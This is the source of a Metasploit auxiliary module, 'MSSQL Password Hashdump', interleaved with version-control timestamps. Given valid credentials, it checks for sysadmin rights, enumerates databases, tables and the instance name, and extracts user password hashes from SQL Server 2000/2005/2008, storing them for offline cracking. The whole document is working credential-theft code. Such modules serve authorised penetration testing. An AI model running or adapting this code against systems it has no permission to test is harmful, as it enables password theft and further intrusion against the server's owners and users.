2011-07-30 21:07:22 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::MSSQL
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'MSSQL Password Hashdump',
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Description' => %Q{
|
|
|
|
This module extracts the usernames and encrypted password
|
|
|
|
hashes from a MSSQL server and stores them for later cracking.
|
|
|
|
This module also saves information about the server version and
|
|
|
|
table names, which can be used to seed the wordlist.
|
|
|
|
},
|
|
|
|
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
|
|
|
|
if (not mssql_login_datastore)
|
|
|
|
print_error("#{rhost}:#{rport} - Invalid SQL Server credentials")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2011-07-30 21:20:57 +00:00
|
|
|
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
|
|
|
|
print_status("Instance Name: #{instancename.inspect}")
|
|
|
|
|
2011-07-30 21:07:22 +00:00
|
|
|
version_year = mssql_query(mssql_sql_info())[:rows][0][0].split('-')[0].slice(/\d\d\d\d/)
|
|
|
|
mssql_db_names = get_db_names()
|
|
|
|
mssql_schema={}
|
|
|
|
unless mssql_db_names.nil?
|
|
|
|
mssql_db_names.each do |dbname|
|
|
|
|
tmp_tblnames = get_tbl_names(dbname[0])
|
|
|
|
unless tmp_tblnames.nil?
|
|
|
|
mssql_schema[dbname]=[]
|
|
|
|
tmp_tblnames.each{|tblname| mssql_schema[dbname] << tblname[0] unless tblname[0].nil?}
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
mssql_hashes = mssql_hashdump(version_year)
|
2011-07-30 21:20:57 +00:00
|
|
|
report_other_data(mssql_schema,instancename,version_year)
|
2011-07-30 21:07:22 +00:00
|
|
|
unless mssql_hashes.nil?
|
|
|
|
report_hashes(mssql_hashes,version_year)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def report_other_data(mssql_schema,info,version_year)
|
|
|
|
|
|
|
|
unless mssql_schema.nil?
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:type => "mssql.schema",
|
|
|
|
:data => mssql_schema,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
unless info.nil?
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:type => "mssql.instancename",
|
|
|
|
:data => info['InstanceName']
|
|
|
|
)
|
|
|
|
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:type => "mssql.version",
|
|
|
|
:data => info['Version'],
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
unless version_year.nil?
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:type => "mssql.version_year",
|
|
|
|
:data => version_year,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def report_hashes(mssql_hashes, version_year)
|
|
|
|
|
|
|
|
case version_year
|
|
|
|
when "2000"
|
|
|
|
hashtype = "mssql_hash"
|
|
|
|
|
|
|
|
when "2005", "2008"
|
|
|
|
hashtype = "mssql05_hash"
|
|
|
|
end
|
|
|
|
|
|
|
|
mssql_hashes.each do |row|
|
|
|
|
next if row[0].nil? or row[1].nil?
|
|
|
|
next if row[0].empty? or row[1].empty?
|
|
|
|
hashstring= "#{row[0]}:#{row[1]}"
|
|
|
|
print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{hashstring}")
|
|
|
|
report_auth_info(
|
|
|
|
:host => datastore['RHOST'],
|
|
|
|
:port => datastore['RPORT'],
|
|
|
|
:sname => 'mssql',
|
|
|
|
:user => row[0],
|
|
|
|
:pass => hashstring,
|
|
|
|
:type => hashtype
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def mssql_hashdump(version_year)
|
|
|
|
is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]
|
|
|
|
|
|
|
|
if is_sysadmin == 0
|
|
|
|
print_error("#{rhost}:#{rport} - The provided credentials do not have privileges to read the password hashes")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
case version_year
|
|
|
|
when "2000"
|
|
|
|
results = mssql_query(mssql_2k_password_hashes())[:rows]
|
|
|
|
|
|
|
|
when "2005", "2008"
|
|
|
|
results = mssql_query(mssql_2k5_password_hashes())[:rows]
|
|
|
|
end
|
|
|
|
return results
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_db_names
|
|
|
|
results = mssql_query(mssql_db_names())[:rows]
|
|
|
|
return results
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_tbl_names(db_name)
|
|
|
|
results = mssql_query("SELECT name FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
|
|
|
|
return results
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|